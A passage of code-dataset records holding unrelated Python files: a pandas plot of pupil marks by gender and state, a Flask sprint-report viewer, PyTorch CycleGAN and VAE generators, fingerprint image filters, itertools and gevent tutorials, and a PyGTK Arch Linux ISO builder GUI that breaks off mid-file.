90000))","sub_path":"pynative/8_dictionary/ex_10.py","file_name":"ex_10.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"491170906","text":"##2 How do boys and girls perform across states?\r\nimport pandas as pd\r\nimport numpy as nump\r\nimport matplotlib.pyplot as plt\r\ndf = pd.read_csv(\"nas-labels.csv\")#read labels\r\npupil = pd.read_csv(\"nas-pupil-marks.csv\")#read marks\r\nboy = 1\r\ngirl = 2\r\n#print df[['Level', 'Rename']]\r\nd = {i[0]: i[1] for i in nump.array(df[['Level', 'Rename']])}\r\n#print d\r\narr = nump.array(df[['Column', 'Level', 'Rename']])\r\n#print arr\r\nstate = {i[1]: i[2] for i in arr if(i[0] == 'State')}\r\n#print state\r\nperf = nump.array(pupil[['State', 'Gender', 'Maths %', 'Reading %', 'Science %', 'Social %']])\r\n#print perf\r\nmarks = {}\r\nboys = []\r\ngirls = []\r\nfor i in state:\r\n add1 = 0.0\r\n add2 = 0.0\r\n for j in perf:\r\n if j[0] == i:\r\n if(j[1]==boy):\r\n if nump.isnan(j[2]) == False : add1 = add1 + j[2]#check if the value is a number\r\n if nump.isnan(j[3]) == False : add1 = add1 + j[3]\r\n if nump.isnan(j[4]) == False : add1 = add1 + j[4]\r\n if nump.isnan(j[5]) == False : add1 = add1 + j[5]\r\n\r\n elif (j[1] == girl):\r\n if nump.isnan(j[2]) == False : add2 = add2 + j[2]\r\n if nump.isnan(j[3]) == False : add2 = add2 + j[3]\r\n if nump.isnan(j[4]) == False : add2 = add2 + j[4]\r\n if nump.isnan(j[5]) == False : add2 = add2 + j[5]\r\n\r\n boys.append(add1)\r\n girls.append(add2)\r\n#print boys\r\nx1 = [2*n for n in range(33)]\r\ny1 = boys\r\nx2 = [2*n+1 for n in range(33)]\r\ny2 = girls\r\nplt.plot(x1, y1, label='Boys', color='r')#plot a line of boys across states\r\nplt.plot(x2, y2, label='Girls', color='c')#plot a line of girls across states\r\nplt.legend()\r\nplt.show()","sub_path":"boys_girls.py","file_name":"boys_girls.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"514538063","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Web interface based on flask\"\"\"\n\n\nimport os\nfrom datetime import date, timedelta\nfrom flask import Flask, redirect, url_for\nfrom opas.hypermark import text as d2h_text\n\n\napp = Flask('OPAS-Web-Interface')\n\n@app.route('/report/')\n@app.route('/report/')\ndef daily_report(sprint_name=None):\n sprint_name = sprint_name or str(date.today())\n year, month, day = list(map(int, sprint_name.split('-')))\n filename = 'summaries/%04d/%02d/sprint-%s.md' % (year, month, sprint_name)\n fullname = 'opas/static/%s' % filename\n if os.path.isfile(fullname):\n return d2h_text(open(fullname).read()).html\n else:\n return \"

[OPAS] Sprint report doesn't exist or the name is invalid!

\"\n\n\ndef start_flask():\n app.run(debug=True)\n\n","sub_path":"opas/webif_flask.py","file_name":"webif_flask.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"562447585","text":"from common.weights import Initializer\nfrom models.cyclegan.layers import ConvBlock\nfrom models.cyclegan.layers import ConvTransposeBlock\nfrom models.cyclegan.layers import LeakyConvBlock\nfrom models.cyclegan.layers import ResidualBlock\nimport torch\nimport torch.nn as nn\n\nclass Generator(nn.Module):\n def __init__(self, in_channels, out_channels, filters=64, residual_layers=9,\n dropout=False, skip=False, init_type='normal',\n init_scale=0.02):\n super(Generator, self).__init__()\n\n self.tanh = nn.Tanh()\n self.skip = skip\n\n # Encoder\n self.encoder = nn.Sequential(\n ConvBlock(\n in_channels, filters, kernel_size=7, stride=1, padding=3),\n ConvBlock(\n filters, filters * 2, kernel_size=3, stride=2, padding=1),\n ConvBlock(\n filters * 2, filters * 4, kernel_size=3, stride=2, padding=1))\n\n # Transformer\n self.transformer = nn.Sequential(\n *[ResidualBlock(filters * 4, kernel_size=3, stride=1, padding=1,\n dropout=dropout) for _ in range(residual_layers)])\n\n # Decoder\n self.decoder = nn.Sequential(\n ConvTransposeBlock(\n filters * 4, filters * 2, kernel_size=3, stride=2, padding=1,\n output_padding=1),\n ConvTransposeBlock(\n filters * 2, filters, kernel_size=3, stride=2, padding=1,\n output_padding=1),\n ConvBlock(\n filters, out_channels, kernel_size=7, stride=1, padding=3,\n relu=False))\n\n # Generator\n self.net = nn.Sequential(self.encoder, self.transformer, self.decoder)\n\n # Initialize weights\n init_weights = Initializer(init_type, init_scale)\n for module in self.net.modules():\n init_weights(module)\n\n def forward(self, x):\n if self.skip:\n return self.tanh(self.net(x) + x)\n else:\n return self.tanh(self.net(x))\n\nclass VAEGenerator(nn.Module):\n def __init__(self, size, in_channels, out_channels, filters=64, z_size=256,\n hidden_layers=2, hidden_size=384, init_type='xavier',\n init_scale=0.02):\n super(VAEGenerator, self).__init__()\n\n assert size == 128 or size == 256 or size == 512\n\n self.size = size\n\n # Encoder\n self.encoder = nn.Sequential(\n ConvBlock(\n in_channels, filters, kernel_size=3, stride=1, padding=1),\n ConvBlock(\n filters, filters, kernel_size=3, stride=1, padding=1),\n ConvBlock(\n filters, filters * 2, kernel_size=3, stride=1, padding=1),\n ConvBlock(\n filters * 2, filters * 2, kernel_size=3, stride=2, padding=1),\n ConvBlock(\n filters * 2, filters * 4, kernel_size=3, stride=1, padding=1),\n ConvBlock(\n filters * 4, filters * 4, kernel_size=3, stride=2, padding=1),\n ConvBlock(\n filters * 4, filters * 8, kernel_size=3, stride=1, padding=1),\n ConvBlock(\n filters * 8, filters * 8, kernel_size=3, stride=1, padding=1),\n ConvBlock(\n filters * 8, filters * 8, kernel_size=3, stride=2, padding=1),\n nn.MaxPool2d(size // 16),\n nn.Flatten(),\n nn.Linear(2 * 2 * filters * 8, int(hidden_size)),\n nn.ReLU(True),\n *[nn.Sequential(\n nn.Linear(hidden_size, hidden_size),\n nn.ReLU(True)) for _ in range(hidden_layers)])\n\n self.calculate_mu = nn.Linear(hidden_size, z_size)\n self.calculate_logvar = nn.Linear(hidden_size, z_size)\n self.resize = nn.Linear(z_size, size * size // 64)\n\n # Decoder\n self.decoder = nn.Sequential(\n ConvTransposeBlock(\n 1, filters * 8, kernel_size=3, stride=2, padding=1,\n output_padding=1),\n ConvTransposeBlock(\n filters * 8, filters * 4, kernel_size=3, stride=2, padding=1,\n output_padding=1),\n ConvTransposeBlock(\n filters * 4, filters * 2, kernel_size=3, stride=2, padding=1,\n output_padding=1),\n ConvTransposeBlock(\n filters * 2, filters, kernel_size=3, stride=1, padding=1),\n ConvTransposeBlock(\n filters, out_channels, kernel_size=3, stride=1, padding=1))\n\n def reparameterize(self, mu, logvar, training=True):\n if training:\n sigma = logvar.mul(0.5).exp_()\n return torch.normal(mu, sigma)\n else:\n return mu\n\n def sample(self, z):\n after = self.resize(z)\n after = after.view((-1, 1, self.size // 8, self.size // 8))\n return self.decoder(after)\n\n def forward(self, x):\n before = self.encoder(x)\n mu = self.calculate_mu(before)\n logvar = self.calculate_logvar(before)\n z = self.reparameterize(mu, logvar)\n return self.sample(z), z, mu, logvar\n","sub_path":"models/cyclegan/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"509879258","text":"\n#import stuff\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\nimport sys\nimport math\nfrom PIL import Image\n\ndef projsum(im, imcen, h, the, x):\n\tstart = np.array([math.floor(imcen + math.cos(the)*x), math.floor(imcen + math.sin(the)*x)]) #where to start summing\n\tdiff = np.array([math.cos(the+math.pi/2),math.sin(the+math.pi/2)]) #sum direction by angle\n\n\tres = int(im[start[0],start[1]]) #start value\n\tfor i in range(1,h): # do the sum\n\t\tres = res + int(im[math.floor(start[0] + i*diff[0]), math.floor(start[1] + i*diff[1])])\n\t\tres = res + int(im[math.floor(start[0] - i*diff[0]), math.floor(start[1] - i*diff[1])])\n\treturn res #return result\n\ndef imagearray_to_RFimage(im):\n\timgsize=im.shape[0]\n\timgcenter = math.ceil(imgsize/2)\n\tw = math.floor(imgsize/2)-1 #sum width\n\th = math.floor(0.5*0.9*math.sqrt(imgsize)) #sum height\n\tposcount = 4*w\n\tanglecount = 100\n\n\tx = np.linspace(-math.pi/2,math.pi/2,anglecount) # angle coordinates\n\ty = np.linspace(-w,w,poscount)\t# position coordinates\n\txv,yv = np.meshgrid(x,y)\t# coordinate matrices\n\tres = np.zeros(xv.shape)\t\t#initialize result matrix\n\n\tfor i in range(0,poscount):\n\t\tif i%10==0:\n\t\t\tsys.stdout.write('in line %i of %i \\r' % (i,poscount))\n\t\t\tsys.stdout.flush()\n\t\tfor j in range(0,anglecount):\n\t\t\tres[i,j] = (projsum(im,imgcenter,h,xv[i,j],yv[i,j]))/(2*h+1)\n\treturn([xv,yv,res,w,h,imgsize])\n\ndef RFimage_to_plot(RFI, OIM, outname): # input [xv,yv,res,w,h,size], OriginalIMageArray, string outname\n\tplt.figure(figsize=(20,10))\n\tplt.subplot(1,2,1)\n\tplt.title('original image')\n\tplt.axis('equal')\n\tplt.pcolormesh(OIM, cmap='gray', vmin=0, vmax=255)\n\n\tplt.subplot(1,2,2)\n\tplt.pcolormesh(RFI[0],RFI[1],RFI[2] , cmap='gray')\n\tplt.title('Ridge frequency image, w=%i pixels, h=%i pixels' % (RFI[3],RFI[4]))\n\tplt.axis([RFI[0].min(), RFI[0].max(), RFI[1].min(), RFI[1].max()])\n\tplt.xlabel('Angle in Radians')\n\tplt.ylabel('Position in Pixels')\n#\tplt.show()\n\tplt.savefig('out/'+ outname + '.png' )\n\ndef plotRF(im,outname):\n\tRFimage_to_plot(imagearray_to_RFimage(im), im, outname)\n\ndef RF_over_Image(im,sz,outname):\n\tfor xpos in range(0,im.shape[0]-sz,sz):\n\t\tfor ypos in range(0,im.shape[1]-sz,sz):\n\t\t\tplotRF(im[xpos:xpos+sz,ypos:ypos+sz], outname+'_'+str(xpos)+' '+str(ypos))\n\ndef matconvolve(L,R):\n\tres = np.zeros(R.shape)\n\tfor i in range(0,R.shape[0]):\n\t\tfor j in range(0,R.shape[1]):\n\t\t\tval = 0\n\t\t\tfor k in range(0,L.shape[0]):\n\t\t\t\tfor l in range(0,L.shape[1]):\n\t\t\t\t\tif i+k-1 in range(0,R.shape[0]): #only good for L of size 3x3...\n\t\t\t\t\t\tif j+l-1 in range(0,R.shape[1]):\n\t\t\t\t\t\t\tval = val + L[k,l]*R[i+k-1,j+l-1]\n\t\t\tres[i,j] = val\n\treturn res\n\ndef findblockori(im):\n\tGx=np.array([[-1,0,1],[-2,0,2],[-1,0,1]]) # sobel stuff\n\tGy=np.array([[-1,-2,-1],[0,0,0],[1,2,1]]) \n#do convolutions\n\timGx=matconvolve(Gx,im) #xgradient\n\timGy=matconvolve(Gy,im) #ygradient\n\timGg=np.sqrt(Gx*Gx+Gy*Gy) #gradient magnitude\n#overall orientation:\n\tgyy = np.sum(2*imGx*imGy)\n\tgxx = np.sum(imGx*imGx-imGy*imGy)\n#\tprint('gxx=%f and gyy=%f' % (gxx,gyy))\n\ttheta = 0.25*math.pi\n\tif gxx != 0: theta = 0.5*math.atan(gyy/gxx)\n\treturn theta\n\ndef backmask(im):\n\trsz = 16 #rastersize\n\tbxsz = 16 #box size for evaluating finger\n\tthreshold = np.sum(im)/im.shape[0]/im.shape[1]\n\tbckg = np.zeros(im.shape) \n\tfor i in range(0,im.shape[0],rsz):\n\t\tfor j in range(0,im.shape[1],rsz):\n\t\t\tarea=min([bxsz,im.shape[0]-i])*min([bxsz,im.shape[1]-j])\n\t\t\tif np.sum(im[i:min([i+bxsz,im.shape[0]]),j:min([j+bxsz,im.shape[1]])]) < threshold*area:\n\t\t\t\tfor k in range(i,min([i+rsz,im.shape[0]])):\n\t\t\t\t\tfor l in range(j,min([j+rsz,im.shape[1]])):\t\t\t\t\t\t\n\t\t\t\t\t\tbckg[k,l]= 1\n\treturn bckg\n\n\ndef orientationmap(im):\n\tprint(im.shape)\n\trsz = 3 #rastersize\n\tbxsz = 8 #box size for finding orientation\n\tori = np.zeros(im.shape)\n\tfor i in range(0,im.shape[0],rsz):\n\t\tfor j in range(0,im.shape[1],rsz):\n\t\t\tiend=min([i+bxsz,im.shape[0]])\n\t\t\tjend=min([j+bxsz,im.shape[1]])\n\t\t\ttheta = findblockori(im[i:iend,j:jend])\n\t\t\tfor k in range(i,min([i+rsz,im.shape[0]])):\n\t\t\t\tfor l in range(j,min([j+rsz,im.shape[1]])):\n\t\t\t\t\tori[k,l]= theta\n\t\t\tsys.stdout.write('orientation raster line %i row %i val %f.\\r' % (i, j, theta))\n\t\t\tsys.stdout.flush()\n\treturn ori\n\t\ndef plottwoarrays(A,B):\n\tplt.figure(figsize=(20,10))\n\tplt.subplot(1,2,1)\n\tplt.title('left image')\n\tplt.axis('equal')\n\tplt.pcolormesh(A, cmap='gray')\n\n\tplt.subplot(1,2,2)\n\tplt.pcolormesh(B , cmap='gray')\n\tplt.axis('equal')\n#\tplt.show()\n\tplt.savefig('twoplot.png' )\n\n#===================\n#MAIN\n#===================\n\nimage = Image.open('input.tif') \t\t\t\t\t\t#import image\nim = np.array(image) \t\t\t\t\t\t\t\t#convert image to numpy\nprint('image size ' +str(im.shape))\n\nres = Image.fromarray(im)\t\t\t\t\t\t\t#save orignal\nres = res.convert('RGB')\nres.save('original.png')\n\nim_sm = matconvolve(np.array([[1/9,1/9,1/9],[1/9,1/9,1/9],[1/9,1/9,1/9]]),im)\t\t#smoothing\nres = Image.fromarray(im_sm)\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('smooth.png')\n\nim_smw = matconvolve((np.array([[1/16,2/16,1/16],[2/16,4/16,2/16],[1/16,2/16,1/16]])),im)\t#smoothing (weighted)\nres = Image.fromarray(im_smw)\t\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('smooth_w.png')\n\nim_xso = matconvolve((np.array([[-1,0,1],[-2,0,2],[-1,0,1]])),im)\t\t\t\t#sobel x\nres = Image.fromarray(im_xso)\t\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('sobel_x.png')\n\nim_yso = matconvolve((np.array([[-1,-2,-1],[0,0,0],[1,2,1]])),im)\t\t\t\t#sobel y\nres = Image.fromarray(im_yso)\t\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('sobel_y.png')\n\nim_gmag = np.sqrt(im_xso*im_xso + im_yso*im_yso)\nres = Image.fromarray(im_gmag)\t\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('sobel_mag.png')\n\n\n\n\n\n#==============\n\nres = Image.fromarray(im[250:275,260:285])\t\t\t\t\t\t\t#save orignal\nres = res.convert('RGB')\nres.save('original_cut.png')\nres = Image.fromarray(im_sm[250:275,260:285])\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('smooth_cut.png')\nres = Image.fromarray(im_smw[250:275,260:285])\t\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('smooth_w_cut.png')\nres = Image.fromarray(im_xso[250:275,260:285])\t\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('sobel_x_cut.png')\nres = Image.fromarray(im_yso[250:275,260:285])\t\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('sobel_y_cut.png')\nres = Image.fromarray(im_gmag[250:275,260:285])\t\t\t\t\t\t\t\t\t#saving\nres = res.convert('RGB')\nres.save('sobel_mag_cut.png')\n\n#[250:275,260:285]\n","sub_path":"Vorlesungen/fingerprint/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":6320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"609279236","text":"# itertools提供的几个“无限”迭代器\n# itertools模块提供的全部是处理迭代功能的函数,它们的返回值不是list,而是Iterator,只有用for循环迭代的时候才真正计算\nimport itertools\n\nnatural = itertools.count(1)\nfor n in natural:\n print(n)\n if n > 100:\n break\n\n# count()会创建一个无限的迭代器,所以上述代码会打印出自然数序列\n\n# cycle()会把传入的一个序列无限重复下去\ncs = itertools.cycle('ABC')\n'''\nfor c in cs:\n print(c)\n'''\n\n# repeat()负责把一个元素无限重复下去,不过如果提供第二个参数就可以限定重复次数\nns = itertools.repeat('A', 3)\nfor n in ns:\n print(n)\n\n\"\"\"\n无限序列只有在for迭代时才会无限地迭代下去,如果只是创建了一个迭代对象,它不会事先把无限个元素生成出来,事实上也不可能在内存中创建无限多个元素。\n无限序列虽然可以无限迭代下去,但是通常我们会通过takewhile()等函数根据条件判断来截取出一个有限的序列\n\"\"\"\nnaturals = itertools.count(1)\nns = itertools.takewhile(lambda x: x <= 10, naturals)\nprint(list(ns))\n\n\"\"\"\nchain()\nchain()可以把一组迭代对象串联起来,形成一个更大的迭代器\n\"\"\"\nfor c in itertools.chain('abc', 'xyz'):\n print(c)\n\n\"\"\"\ngroupby()\ngroupby()把迭代器中相邻的重复元素挑出来放在一起\n\"\"\"\nfor key, group in itertools.groupby('AAABBBCCAAA'):\n print(key, list(group))\n'''\nA ['A', 'A', 'A']\nB ['B', 'B', 'B']\nC ['C', 'C']\nA ['A', 'A', 'A']\n'''\n# 实际上挑选规则是通过函数完成的,只要作用于函数的两个元素返回的值相等,这两个元素就被认为是在一组的,\n# 而函数返回值作为组的key。如果我们要忽略大小写分组,就可以让元素'A'和'a'都返回相同的key\nfor key, group in itertools.groupby('AaaBBbcCAAa', lambda c: c.upper()):\n print(key, list(group))\n'''\nA ['A', 'a', 'a']\nB ['B', 'B', 'b']\nC ['c', 'C']\nA ['A', 'A', 'a']\n'''\n","sub_path":"src/day0122/exercise016_itertools.py","file_name":"exercise016_itertools.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541426976","text":"# -*- coding: utf-8 -*- \n\"\"\" \n------------------------------------------------- \n File Name: monkey.py \n Description : \n Author : flyskywen \n date: 18-10-31 \n------------------------------------------------- \n Change Activity: \n 18-10-31: \n------------------------------------------------- \n\"\"\"\n__author__ = 'flyskywen'\n\nfrom gevent import monkey;monkey.patch_all()\nimport gevent\nimport threading\nimport time\n\n\n# 猴子补丁 将之后导入的所有阻塞操作打包成一个包\n# 猴子补丁 使用的是不同的线程!!!\n# 实际上是使用的虚拟线程,还是在同一个线程中\n\n\ndef func1():\n print('\\033[31;1mplay start\\033[0m %s' % threading.currentThread())\n # time.sleep()打包成非阻塞操作\n time.sleep(3)\n print('\\033[31;1mplay end\\033[0m')\n\n\ndef func2():\n print('\\033[32;1meat start\\033[0m %s' % threading.currentThread())\n time.sleep(1)\n print('\\033[32;1meat end\\033[0m')\n\n\n# 实现了func1和func2 并发执行\ngevent.joinall([\n gevent.spawn(func1),\n gevent.spawn(func2),\n # gevent.spawn(func3),\n])\n\nprint(threading.current_thread())\n","sub_path":"PyCharm_workspace/FullStack/Without_django/Gevent/monkey.py","file_name":"monkey.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"90028984","text":"#!/usr/bin/python2\n\nimport os\n\nimport pygtk\npygtk.require('2.0')\n\nimport gtk\nimport gtk.glade\n\nclass ArchBuild:\n\tdef __init__(self):\n\t\t# ===================== builder section =====================\n\n\t\t# gui builder from ui glade file\n\t\tguibuilder=gtk.Builder()\n\t\tif os.path.exists(\"/usr/share/achmadi-iso/archbuild.glade\"):\n\t\t\tguibuilder.add_from_file(\"/usr/share/achmadi-iso/archbuild.glade\")\n\t\telse:\n\t\t\tguibuilder.add_from_file(\"./archbuild.glade\")\n\t\tguibuilder.connect_signals(self)\n\n\t\t# window\n\t\twindow=guibuilder.get_object(\"wndwArchBuild\")\n\t\twindow.connect(\"destroy\",self.on_destroy)\n\n\t\t# architecture\n\t\tself.rbtArch32=guibuilder.get_object(\"rbtArch32\")\n\t\tself.rbtArch64=guibuilder.get_object(\"rbtArch64\")\n\n\t\t# working directory\n\t\tself.txtWorkDir=guibuilder.get_object(\"txtWorkDir\")\n\t\tself.btnWorkDir=guibuilder.get_object(\"btnWorkDir\")\n\n\t\t# iso file output\n\t\tself.txtIsoFile=guibuilder.get_object(\"txtIsoFile\")\n\n\t\t# user and host\n\t\tself.txtUser=guibuilder.get_object(\"txtUser\")\n\t\tself.txtHost=guibuilder.get_object(\"txtHost\")\n\n\t\t# pacman config\n\t\tself.txtPacConf=guibuilder.get_object(\"txtPacConf\")\n\t\tself.btnPacOpen=guibuilder.get_object(\"btnPacOpen\")\n\n\t\t# database directory\n\t\tself.txtDbDir=guibuilder.get_object(\"txtDbDir\")\n\t\tself.btnDbDir=guibuilder.get_object(\"btnDbDir\")\n\n\t\t# package list\n\t\tself.txtPkgRepo=guibuilder.get_object(\"txtPkgRepo\")\n\t\tself.btnPkgRepo=guibuilder.get_object(\"btnPkgRepo\")\n\t\tself.txtPkgBuild=guibuilder.get_object(\"txtPkgBuild\")\n\t\tself.btnPkgBuild=guibuilder.get_object(\"btnPkgBuild\")\n\t\tself.txtPkgBuildDep=guibuilder.get_object(\"txtPkgBuildDep\")\n\t\tself.btnPkgBuildDep=guibuilder.get_object(\"btnPkgBuildDep\")\n\n\t\t# base iso file\n\t\tself.txtBaseIso=guibuilder.get_object(\"txtBaseIso\")\n\t\tself.btnBaseIso=guibuilder.get_object(\"btnBaseIso\")\n\n\t\t# package directory\n\t\tself.txtPkgDirRepo=guibuilder.get_object(\"txtPkgDirRepo\")\n\t\tself.btnPkgDirRepo=guibuilder.get_object(\"btnPkgDirRepo\")\n\t\tself.txtPkgDirBuild=guibuilder.get_object(\"txtPkgDirBuild\")\n\t\tself.btnPkgDirBuild=guibuilder.get_object(\"btnPkgDirBuild\")\n\n\t\t# configuration script\n\t\tself.txtConfScript=guibuilder.get_object(\"txtConfScript\")\n\t\tself.btnConfScript=guibuilder.get_object(\"btnConfScript\")\n\n\t\t# command\n\t\tself.btnGenerate=guibuilder.get_object(\"btnGenerate\")\n\n\t\t# ===================== default section =====================\n\n\t\t# ===================== connect section =====================\n\n\t\t# working directory\n\t\tself.btnWorkDir.connect(\"clicked\",self.on_work_dir_open)\n\n\t\t# pacman config\n\t\tself.btnPacOpen.connect(\"clicked\",self.on_pac_conf_open)\n\n\t\t# database directory\n\t\tself.btnDbDir.connect(\"clicked\",self.on_db_dir_open)\n\n\t\t# package list\n\t\tself.btnPkgRepo.connect(\"clicked\",self.on_pkg_repo_open)\n\t\tself.btnPkgBuild.connect(\"clicked\",self.on_pkg_build_open)\n\t\tself.btnPkgBuildDep.connect(\"clicked\",self.on_pkg_builddep_open)\n\n\t\t# base iso file\n\t\tself.btnBaseIso.connect(\"clicked\",self.on_base_iso_open)\n\n\t\t# package directory\n\t\tself.btnPkgDirRepo.connect(\"clicked\",self.on_pkgdir_repo_open)\n\t\tself.btnPkgDirBuild.connect(\"clicked\",self.on_pkgdir_build_open)\n\n\t\t# configuration script\n\t\tself.btnConfScript.connect(\"clicked\",self.on_conf_script_open)\n\n\t\t# command\n\t\tself.btnGenerate.connect(\"clicked\",self.on_generate_script)\n\n\t\t# ===================== app section =====================\n\n\t\twindow.show()\n\n\tdef on_destroy(self, widget):\n\t\tgtk.main_quit()\n\n\t\t# ===================== widget routine section =====================\n\n\t# working directory\n\tdef on_work_dir_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select Working Directory\",None, gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtWorkDir.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\t# pacman config\n\tdef on_pac_conf_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select custom Pacman config file\",None, gtk.FILE_CHOOSER_ACTION_OPEN,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tfile_filter = gtk.FileFilter()\n\t\tfile_filter.set_name(\"Text File\")\n\t\tfile_filter.add_mime_type(\"text/plain\")\n\t\tfile_filter.add_pattern(\"*.conf\")\n\t\tdialog.add_filter(file_filter)\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtPacConf.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\t# database directory\n\tdef on_db_dir_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select Database Directory\",None, gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtDbDir.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\t# package list\n\tdef on_pkg_repo_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select Repository Package List\",None, gtk.FILE_CHOOSER_ACTION_OPEN,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tfile_filter = gtk.FileFilter()\n\t\tfile_filter.set_name(\"Text File\")\n\t\tfile_filter.add_mime_type(\"text/plain\")\n\t\tfile_filter.add_pattern(\"*.txt\")\n\t\tdialog.add_filter(file_filter)\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtPkgRepo.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\tdef on_pkg_build_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select Builded Package List\",None, gtk.FILE_CHOOSER_ACTION_OPEN,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tfile_filter = gtk.FileFilter()\n\t\tfile_filter.set_name(\"Text File\")\n\t\tfile_filter.add_mime_type(\"text/plain\")\n\t\tfile_filter.add_pattern(\"*.txt\")\n\t\tdialog.add_filter(file_filter)\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtPkgBuild.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\tdef on_pkg_builddep_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select Builded Dependencies Package List\",None, gtk.FILE_CHOOSER_ACTION_OPEN,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tfile_filter = gtk.FileFilter()\n\t\tfile_filter.set_name(\"Text File\")\n\t\tfile_filter.add_mime_type(\"text/plain\")\n\t\tfile_filter.add_pattern(\"*.txt\")\n\t\tdialog.add_filter(file_filter)\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtPkgBuildDep.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\t# base iso file\n\tdef on_base_iso_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select Arch Linux ISO\",None, gtk.FILE_CHOOSER_ACTION_OPEN,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tfile_filter = gtk.FileFilter()\n\t\tfile_filter.set_name(\"ISO File\")\n\t\tfile_filter.add_mime_type(\"application/x-cd-image\")\n\t\tfile_filter.add_pattern(\"*.iso\")\n\t\tdialog.add_filter(file_filter)\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtBaseIso.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\t# package directory\n\tdef on_pkgdir_repo_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select Repository Package Directory\",None, gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtPkgDirRepo.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\tdef on_pkgdir_build_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select Build Package Directory\",None, gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtPkgDirBuild.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\t# configuration script\n\tdef on_conf_script_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select Shell Script\",None, gtk.FILE_CHOOSER_ACTION_OPEN,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tfile_filter = gtk.FileFilter()\n\t\tfile_filter.set_name(\"Shell Script\")\n\t\tfile_filter.add_mime_type(\"application/x-shellscript\")\n\t\tdialog.add_filter(file_filter)\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtConfScript.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\t# 